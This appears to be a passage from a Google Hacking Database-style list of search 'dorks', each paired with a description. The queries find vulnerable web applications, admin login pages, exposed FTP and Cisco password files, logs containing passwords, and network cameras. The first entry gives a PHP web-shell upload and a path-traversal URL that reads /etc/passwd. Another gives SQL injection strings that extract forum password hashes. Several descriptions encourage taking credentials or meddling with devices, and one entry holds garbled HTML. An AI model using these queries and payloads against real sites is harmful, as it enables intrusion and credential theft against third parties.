at the begin of the script we have: <br>
<br>
<br>

@ob_start(); <br>
<br>
look at the php ob_ start man page : <br>
<br>
"This function will turn output buffering on. While output buffering is active no output is <br>
sent from the script (other than headers), instead the output is stored in an internal buffer." <br>
<br>
However, this is not a secure way to protect a script: <br>
buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but <br>
you can execute arbirtrary commands and after to see any file :) : <br>
<br>
when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: <br>
<br>
<?php error_reporting(0); system($HTTP_GET_VARS[cmd].' > temp.txt'); ?> <br>
<br>
usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] <br>
azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions <br>
you cannot calculate but you can retrieve the filename from azdg pages when file <br>
is showned on screen (!), so you can do this: <br>
<br>
http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd <br>
<br>
the output will be redirected to ./include/temp.txt <br>
<br>
so you make a GET request of this file and you have /etc/passwd file <br>
<br>
you can find my poc exploit at this url:<br>
http://rgod.altervista.org/azdg.html<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+AzDg%22+%282.1.3+%7C+2.1.2+%7C+2.1.1%29&btnG=Search[url]]
[[dork]"Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1)[dork]]
[end][1436]]
[[start][1437]
[[title]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[[title]]
[[descr]iCMS - Content Management System...<br>
Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!<br>
<br>
Dont think there are any vulns attached to this<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[dork]]
[end][1437]]
[[start][1438]
[[title]"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net[[title]]
[[descr]Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br>
<br>
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.<br>
<br>
http://secunia.com/advisories/16878/[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by%3A+Land+Down+Under+800%22+%7C++%22Powered+by%3A+Land+Down+Under+801%22+-+www.neocrome.net&btnG=Search[url]]
[[dork]"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net[dork]]
[end][1438]]
[[start][1439]
[[title]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin[[title]]
[[descr]There seems to be several vulns for qmail.[descr]]
[[url]http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin [dork]]
[end][1439]]
[[start][1440]
[[title]"powered by Gallery v" "slideshow]"|"images" inurl:gallery[[title]]
[[descr]There is a script injection vuln for all versions.<br>
<br>
http://www.securityfocus.com/bid/14668[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+Gallery+v%22+%22%5Bslideshow%5D%22%7C%22images%22+inurl%3Agallery&btnG=Search[url]]
[[dork]"powered by Gallery v" "[slideshow]"|"images" inurl:gallery[dork]]
[end][1440]]
[[start][1441]
[[title]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[title]]
[[descr]Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br>
<br>
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.<br>
<br>
http://secunia.com/product/4356/<br>
http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail[descr]]
[[url]http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[dork]]
[end][1441]]
[[start][1442]
[[title]intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff[[title]]
[[descr]phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Backup-Management+(phpMyBackup+v.0.4+beta+*+)%22+-johnny.ihackstuff&num=100&filter=0[url]]
[[dork]intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff[dork]]
[end][1442]]
[[start][1443]
[[title]"Powered by Monster Top List" MTL numrange:200-[[title]]
[[descr]2 Step dork - Change url to add filename "admin.php" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.<br>
<br>
This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective.<br>
<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Monster+Top+List%22+MTL+numrange%3A200-&btnG=Search[url]]
[[dork]"Powered by Monster Top List" MTL numrange:200-[dork]]
[end][1443]]
[[start][1444]
[[title]"login prompt" inurl:GM.cgi[[title]]
[[descr]GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22login+prompt%22+inurl%3AGM.cgi&btnG=Search[url]]
[[dork]"login prompt" inurl:GM.cgi[dork]]
[end][1444]]
[[start][1445]
[[title]"e107.org 2002/2003" inurl:forum_post.php?nt[[title]]
[[descr]e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.<br>
<br>
Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.<br>
<br>
http://www.securityfocus.com/bid/14699[descr]]
[[url]http://www.google.com/search?q=%22e107.org+2002/2003%22+inurl:forum_post.php%3Fnt&hl=en&lr=&c2coff=1&start=0&sa=N[url]]
[[dork]"e107.org 2002/2003" inurl:forum_post.php?nt[dork]]
[end][1445]]
[[start][1446]
[[title]filetype:dat inurl:Sites.dat[[title]]
[[descr]If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory).<br>
[descr]]
[[url]http://www.google.com/search?q=filetype:dat+inurl:Sites.dat[url]]
[[dork]filetype:dat inurl:Sites.dat[dork]]
[end][1446]]
[[start][1447]
[[title]intext:"enable password 7"[title]]
[[descr]Some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com<br>
[descr]]
[[url]http://www.google.com/search?q=intext:%22enable+password+7%22[url]]
[[dork]intext:"enable password 7"[dork]]
[end][1447]]
[[start][1448]
[[title]"Copyright 2004 © Digital Scribe v.1.4"[title]]
[[descr]Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution<br>
<br>
software site: http://www.digital-scribe.org/<br>
<br>
description: "Teachers have full control through a web-based interface. Designed<br>
for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
email: retrogod at aliceposta it[descr]]
[[url]http://www.google.com/search?q=%22Copyright+2004+%C2%A9+Digital+Scribe+v.1.4%22&hl=it&lr=&c2coff=1&filter=0[url]]
[[dork]"Copyright 2004 © Digital Scribe v.1.4"[dork]]
[end][1448]]
[[start][1449]
[[title]"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos[[title]]
[[descr]IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22you+can+now+password%22+%7C+%22this+is+a+special+page+only+seen+by+you.+your+profile+visitors%22++inurl%3Aimchaos[url]]
[[dork]"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos[dork]]
[end][1449]]
[[start][1450]
[[title]XOOPS Custom Installation[[title]]
[[descr]XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data.[descr]]
[[url]http://www.google.com/search?q=intitle:%22XOOPS+Custom+Installation%22&hl=en&lr=&c2coff=1&start=20&sa=N[url]]
[[dork]intitle:"XOOPS Custom Installation"[dork]]
[end][1450]]
[[start][1451]
[[title]intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces[[title]]
[[descr]Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22netbotz+appliance%22+-inurl%3A.php+-inurl%3A.asp+-inurl%3A.pdf+-inurl%3Asecuritypipeline+-announces[url]]
[[dork]intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces[dork]]
[end][1451]]
[[start][1452]
[[title]"Powered by PHP Advanced Transfer Manager"[title]]
[[descr]PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scripting<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod at aliceposta it<br>
[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22[url]]
[[dork]"Powered by PHP Advanced Transfer Manager v1.30"[dork]]
[end][1452]]
[[start][1453]
[[title]"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin[[title]]
[[descr]This reveals admin site for Argo Software Design Mail Server.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&as_qdr=all&q=%22Welcome+to+Administration%22+%22General%22+%22Local+Domains%22+%22SMTP+Authentication%22+inurl%3Aadmin&btnG=Search[url]]
[[dork]"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin[dork]]
[end][1453]]
[[start][1454]
[[title]"Powered by CuteNews"[title]]
[[descr]CuteNews 1.4.0 (possibly prior versions) remote code execution<br>
<br>
software site: http://cutephp.com/<br>
<br>
description: "Cute news is a powerful and easy for using news management <br>
system that use flat files to store its database. It supports comments, archives, <br>
search function, image uploading, backup function, IP banning, flood protection ..."<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod [at] aliceposta it[descr]]
[[url]http://www.google.com/search?&q=%22powered+by+cutenews+1.4.%22[url]]
[[dork]"powered by cutenews 1.4."[dork]]
[end][1454]]
[[start][1455]
[[title]intitle:rapidshare intext:login[[title]]
[[descr]Rapidshare login passwords.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1455]]
[[start][1456]
[[title]intitle:"PHProjekt - login" login password[[title]]
[[descr]PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this[descr]]
[[url]http://www.google.com/search?q=intitle:%22PHProjekt+-+login%22+login+password&num=100[url]]
[[dork]intitle:"PHProjekt - login" login password[dork]]
[end][1456]]
[[start][1457]
[[title]Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype:shtml[[title]]
[[descr]This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people.[descr]]
[[url]http://www.google.com/search?hl=en&q=Phaser+numrange%3A100-100000+Name+DNS+IP+%22More+Printers%22+index+help+filetype%3Ahtml+%7C+filetype%3Ashtml[url]]
[[dork]Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype:shtml[dork]]
[end][1457]]
[[start][1458]
[[title]intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a[[title]]
[[descr]This search finds orite 301 netcams with audio capabilities. [descr]]
[[url]http://www.google.com/search?q=intitle:%22Orite+IC301%22+%7C+intitle:%22ORITE+Audio+IP-Camera+IC-301%22+-the+-a&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a[dork]]
[end][1458]]
[[start][1459]
[[title]"Powered by GTChat 0.95"+"User Login"+"Remember my login information"[title]]
[[descr]There is a (adduser) remote denial of service vulnerabilty on version 0.95[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+GTChat+0.95%22%2B%22User+Login%22%2B%22Remember+my+login+information%22[url]]
[[dork]"Powered by GTChat 0.95"+"User Login"+"Remember my login information"[dork]]
[end][1459]]
[[start][1460]
[[title]http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22[[title]]
[[descr]WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. [descr]]
[[url]http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22</i></b></font><br> <a class="pn-normal" href="mailto:michael_mac266@hotmail.com">MacUK</a> <b>rates it:</b>
<img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""> <b>Community rates it:</b> (no ratings yet)<p align=justify><font class="pn-normal">WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. </font><p><font class="pn-normal"><br><b>Click here for the Google search ==> <a class="pn-normal" href="[url]]
[[dork]intitle:"WEB//NEWS Personal Newsmanagement" intext:"© 2002-2004 by Christian Scheb - Stylemotion.de"+"</i></b></font><br> <a class="pn-normal" href="mailto:michael_mac266@hotmail.com">MacUK</a> <b>rates it:</b>
<img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""><img src="modules/ProdReviews/images/blue.gif" alt=""> <b>Community rates it:</b> (no ratings yet)<p align=justify><font class="pn-normal">WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. </font><p><font class="pn-normal"><br><b>Click here for the Google search ==> <a class="pn-normal" href="[dork]]
[end][1460]]
[[start][1461]
[[title]inurl:/modcp/ intext:Moderator+vBulletin[[title]]
[[descr]there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards. [descr]]
[[url]http://www.google.com/search?q=inurl:/modcp/+intext:Moderator%2BvBulletin&hl=en&lr=&c2coff=1&safe=off&start=0&sa=N[url]]
[[dork]inurl:/modcp/ intext:Moderator+vBulletin[dork]]
[end][1461]]
[[start][1462]
[[title]intitle:"i-secure v1.1" -edu[[title]]
[[descr]I-Secure Login Pages[descr]]
[[url]http://www.google.com/search?q=intitle:%22i-secure+v1.1%22+-edu&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"i-secure v1.1" -edu[dork]]
[end][1462]]
[[start][1463]
[[title]intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=[[title]]
[[descr]Aimoo Login Pages. "Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!"<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Login+to+the+forums+-+%40www.aimoo.com%22+inurl:login.cfm%3Fid%3D&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=[dork]]
[end][1463]]
[[start][1464]
[[title]intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user:" intext:"Forum Powered By AnyBoard" inurl:gochat -edu[[title]]
[[descr]Anyboard Login Portals. In addition,<br>
A vulnerability has been reported in Netbula Anyboard 9.x "that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker."descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22Login+Forum+Powered+By+AnyBoard%22+intitle%3A%22If+you+are+a+new+user%22+intext%3A%22Forum+Powered+By+AnyBoard%22+inurl%3Agochat+-edu[url]]
[[dork]intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user" intext:"Forum Powered By AnyBoard" inurl:gochat -edu[dork]]
[end][1464]]
[[start][1465]
[[title]"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1[[title]]
[[descr]Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Mimicboard2+086%22%2B%222000+Nobutaka+Makino%22%2B%22password%22%2B%22message%22+inurl%3Apage%3D1&btnG=Search[url]]
[[dork]"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1[dork]]
[end][1465]]
[[start][1466]
[[title]"your password is" filetype:log[[title]]
[[descr]This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22your+password+is%22+filetype%3Alog[url]]
[[dork]"your password is" filetype:log[dork]]
[end][1466]]
[[start][1467]
[[title] "admin account info" filetype:log[[title]]
[[descr]Searches for logs containing admin server account information such as username and password.[descr]]
[[url]http://www.google.com/search?q=+%22admin+account+info%22+filetype%3Alog[url]]
[[dork] "admin account info" filetype:log[dork]]
[end][1467]]
[[start][1468]
[[title]"Warning: Supplied argument is not a valid File-Handle resource in"[title]]
[[descr]This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Warning%3A+Supplied+argument+is+not+a+valid+File-Handle+resource+in%22+[url]]
[[dork]"Warning: Supplied argument is not a valid File-Handle resource in" [dork]]
[end][1468]]
[[start][1469]
[[title]"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl"[title]]
[[descr]Subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. <br>
<br>
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.<br>
<br>
http://www.securityfocus.com/bid/14817/exploit[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Maintained+with+Subscribe+Me+2.044.09p%22%2B%22Professional%22+inurl%3A%22s.pl%22+[url]]
[[dork]"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl" [dork]]
[end][1469]]
[[start][1470]
[[title]"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"[title]]
[[descr]This error message reveals full path information. Recommend use of site: operator to narrow searches.<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Warning%3A%22+%22SAFE+MODE+Restriction+in+effect.%22+%22The+script+whose+uid+is%22+%22is+not+allowed+to+access+owned+by+uid+0+in%22+%22on+line%22[url]]
[[dork]"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"[dork]]
[end][1470]]
[[start][1471]
[[title]intitle:"Admin Login" "admin login" "blogware"[title]]
[[descr]Blogware Login Portal: "An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web – share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It’s simple! There is no HTML to learn and no new software to download and install."descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Admin+Login%22+%22admin+login%22+%22blogware%22+-site%3Ablogware.com+-filetype%3Ahtml[url]]
[[dork]intitle:"Admin Login" "admin login" "blogware" -site:blogware.com -filetype:html[dork]]
[end][1471]]
[[start][1472]
[[title]intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login[[title]]
[[descr]net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22net2ftp%22+%22powered+by+net2ftp%22+inurl%3Aftp+OR+intext%3Alogin+OR+inurl%3Alogin[url]]
[[dork]intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login[dork]]
[end][1472]]
[[start][1473]
[[title]inurl:cartwiz/store/index.asp[[title]]
[[descr]The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.<br>
<br>
There are, multiple sql injection and xss in cartwiz asp cart.<br>
<br>
http://neworder.box.sk/explread.php?newsid=13534[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=inurl%3Acartwiz%2Fstore%2Findex.asp[url]]
[[dork]inurl:cartwiz/store/index.asp[dork]]
[end][1473]]
[[start][1474]
[[title]intitle:"Control panel" "Control Panel Login" ArticleLive inurl:admin -demo[[title]]
[[descr]Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.<br>
<br>
Authentication bypass, sql injections and xss in ArticleLive 2005<br>
<br>
http://neworder.box.sk/explread.php?newsid=13582[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Control+panel%22+%22Control+Panel+Login%22+ArticleLive+inurl%3Aadmin+-demo&filter=0[url]]
[[dork]intitle:"Control panel" "Control Panel Login" ArticleLive inurl:admin -demo[dork]]
[end][1474]]
[[start][1475]
[[title]"Powered by autolinks pro 2.1" inurl:register.php[[title]]
[[descr]AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.<br>
<br>
Remote PHP File Include Vulnerability<br>
http://www.securityfocus.com/archive/1/409529/30/120/threaded [descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+autolinks+pro+2.1%22+inurl%3Aregister.php[url]]
[[dork]"Powered by autolinks pro 2.1" inurl:register.php[dork]]
[end][1475]]
[[start][1476]
[[title]"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*[[title]]
[[descr]cosmoshop is a comercial shop system written as a CGI.<br>
<br>
vulnerabilities:<br>
sql injection, passwords saved in cleartext, view any file<br>
http://www.securityfocus.com/archive/1/409510/30/120/threaded[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22CosmoShop+by+Zaunz+Publishing%22+inurl%3A%22cgi-bin%2Fcosmoshop%2Flshop.cgi%22+-johnny.ihackstuff.com+-V8.10.106+-V8.10.100+-V.8.10.85+-V8.10.108+-V8.11*[url]]
[[dork]"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*[dork]]
[end][1476]]
[[start][1477]
[[title]openbb "powered by open bulletin board " -1.0-6 -1.0-7 -1.0-8 -vulnerable[[title]]
[[descr]Open Bulletin Board is an open source discussion software package.<br>
<br>
SQL Injection Exploit:<br>
http://www.governmentsecurity.org/forum/index.php?showtopic=15610&pid=121577&st=0&#entry121577[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=openbb+%22powered+by+open+bulletin+board+%22+-1.0-6+-1.0-7+-1.0-8+-vulnerable[url]]
[[dork]openbb "powered by open bulletin board " -1.0-6 -1.0-7 -1.0-8 -vulnerable[dork]]
[end][1477]]
[[start][1478]
[[title]"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"[title]]
[[descr]It's an exact replica of vbulletin but it is free.<br>
<br>
SQL-Injection Exploit:<br>
http://www.governmentsecurity.org/archive/t14850.html[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Woltlab+Burning+Board%22+-%222.3.3%22+-%22v2.3.3%22+-%22v2.3.2%22+-%222.3.2%22[url]]
[[dork]"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"[dork]]
[end][1478]]
[[start][1479]
[[title]"Please login with admin pass" -"leak" -sourceforge[[title]]
[[descr]PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etc<br>
<br>
Admin password leak:<br>
http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22Please+login+with+admin+pass%22+-%22leak%22+-sourceforge[url]]
[[dork]"Please login with admin pass" -"leak" -sourceforge[dork]]
[end][1479]]
[[start][1480]
[[title]intitle:"PHP TopSites FREE Remote Admin"[title]]
[[descr]PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.<br>
<br>
PHP TopSites Discloses Configuration Data to Remote Users:<br>
http://www.securitytracker.com/alerts/2005/Jul/1014552.html<br>
<br>
PS: all versions are vulnerable at time of writing.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22PHP+TopSites+FREE+Remote+Admin%22[url]]
[[dork]intitle:"PHP TopSites FREE Remote Admin"[dork]]
[end][1480]]
[[start][1481]
[[title]intitle:"iDevAffiliate - admin" -demo[[title]]
[[descr]Affiliate Tracking Software <br>
Adding affiliate tracking software to your site is one of the most effective ways to achieve more <br>
sales and more traffic! Our affiliate software installs in just minutes and integrates easily into<br>
your existing website.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22iDevAffiliate+-+admin%22+-demo[url]]
[[dork]intitle:"iDevAffiliate - admin" -demo[dork]]
[end][1481]]
[[start][1482]
[[title]"powered by my little forum"[title]]
[[descr]My Little Forum 1.5 / 1.6beta SQL Injection<br>
<br>
software:<br>
site: http://www.mylittlehomepage.net/my_little_forum<br>
software: "A simple web-forum that supports classical thread view (message tree)<br>
as well as messagebord view to display the messages.<br>
Requires PHP > 4.1 and a MySQL database."<br>
<br>
<br>
1) look at the vulnerable code at line 144 inside search.php:<br>
...<br>
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".<br>
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,<br>
DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')<br>
AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."<br>
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "<br>
.$settings['search_results_per_page'], $connid);<br>
...<br>
<br>
now goto the search page, select "phrase", and type:<br>
<br>
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,<br>
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where<br>
user_name='[username]' /*<br>
<br>
if magic quotes are off you will have (guess?...) any admin/user password hash<br>
'cause $searchstring var is not filtered...<br>
<br>
u can fin my poc exploit here:<br>
<br>
http://rgod.altervista.org/mylittle15_16b.html<br>
<br>
<br>
2) 1.6beta is vulnerable even, we have:<br>
...<br>
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL ".$time_difference." HOUR) AS<br>
Uhrzeit, subject, name, email, hp, place, text, category FROM ".$db_settings['forum_table']."<br>
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'],<br>
$connid);<br>
...<br>
<br>
you have same results, deleting a statement in injection string:<br>
<br>
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,<br>
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where<br>
user_name='[username]' /*[descr]]
[[url]http://www.google.com/search?hl=it&q=%22powered+by+my+little+forum%22&btnG=Cerca&meta=[url]]
[[dork]"powered by my little forum"[dork]]
[end][1482]]
[[start][1483]
[[title]"powered by mailgust"[title]]
